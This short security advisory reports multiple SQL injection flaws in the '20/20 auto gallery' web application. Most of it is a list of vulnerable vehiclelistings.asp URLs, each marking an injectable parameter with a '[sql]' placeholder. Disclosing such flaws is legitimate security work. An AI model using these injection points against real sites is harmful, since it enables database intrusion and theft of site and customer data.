20/20 auto gallery suffers from multiple SQL injection vulnerabilities.
208a0c5b5b9052c114f8fd8311ef494d7ec700dc15ee26370352f02e379689a7
vendor site:http://www.2020autogallery.com/
product:20/20 auto gallery
bug:injection sql
global risk:high
injection sql get :
http://site.com/vehiclelistings.asp?vehicleID='[sql]
http://site.com/vehiclelistings.asp?categoryID_list='[sql]
http://site.com/vehiclelistings.asp?sale_type='[sql]
http://site.com/vehiclelistings.asp?sale_type=&categoryID_list='[sql]
http://site.com/vehiclelistings.asp?trKeywords=123&boolean=OR&stock_number='[sql]
http://site.com/vehiclelistings.asp?sale_type=&categoryID_list=&manufacturer='[sql]
http://site.com/vehiclelistings.asp?sale_type=&categoryID_list=&manufacturer=&model='[sql]
http://site.com/vehiclelistings.asp?trKeywords=123&boolean=OR&stock_number=&vehicleID='[sql]
http://site.com/vehiclelistings.asp?sale_type=&categoryID_list=&manufacturer=&model=&year='[sql]
http://site.com/vehiclelistings.asp?trKeywords=123&boolean=OR&stock_number=&vehicleID=&vin='[sql]
http://site.com/vehiclelistings.asp?sale_type=&categoryID_list=&manufacturer=&model=&year=&listing_price='[sql]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com